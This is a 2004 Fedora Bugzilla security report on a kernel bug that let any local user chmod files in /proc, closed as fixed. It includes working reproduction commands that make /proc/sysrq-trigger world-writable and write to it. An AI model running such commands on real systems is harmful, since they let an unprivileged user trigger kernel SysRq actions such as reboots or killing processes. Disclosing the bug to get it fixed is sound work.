Bug 128124

Summary: procfs chmod as any user
Product: [Fedora] Fedora Reporter: Chuck Berg <cberg>
Component: kernelAssignee: Dave Jones <davej>
Status: CLOSED CURRENTRELEASE QA Contact: Brian Brock <bbrock>
Severity: medium Docs Contact:
Priority: medium    
Version: 2CC: pfrields, wtogami
Target Milestone: ---Keywords: Security
Target Release: ---   
Hardware: All   
OS: Linux   
Whiteboard:
Fixed In Version: Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of: Environment:
Last Closed: 2004-11-27 04:42:36 UTC Type: ---
Regression: --- Mount Type: ---
Documentation: --- CRM:
Verified Versions: Category: ---
oVirt Team: --- RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: --- Target Upstream Version:
Embargoed:

Description Chuck Berg 2004-07-18 20:33:17 UTC
From Bugzilla Helper:
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7) Gecko/20040616

Description of problem:
Over two weeks ago, a serious locally exploitable security hole was
found in the kernel. See here: http://lkml.org/lkml/2004/7/3/61

A normal user can chmod most files in /proc.


Version-Release number of selected component (if applicable):
2.6.6-1.435.2.3smp

How reproducible:
Always

Steps to Reproduce:
charm:~$ uname -r
2.6.6-1.435.2.3smp
charm:~$ id -u
154
charm:~$ chmod a+w /proc/sysrq-trigger
charm:~$ ls -l /proc/sysrq-trigger
--w--w--w-  1 root root 0 Jul 18 16:26 /proc/sysrq-trigger
charm:~$ echo / > /proc/sysrq-trigger
charm:~$ dmesg | tail -1
SysRq : HELP : loglevel0-8 reBoot tErm kIll saK showMem powerOff
showPc unRaw Sync showTasks Unmount


Actual Results:  chmod succeeds


Expected Results:  chmod fails

Additional info:

Comment 1 Dave Jones 2004-10-25 23:26:02 UTC
this got fixed in mainline, did it make it into the 521 update for FC2 ?
I'll be doing a 2.6.9 based FC2 update soon.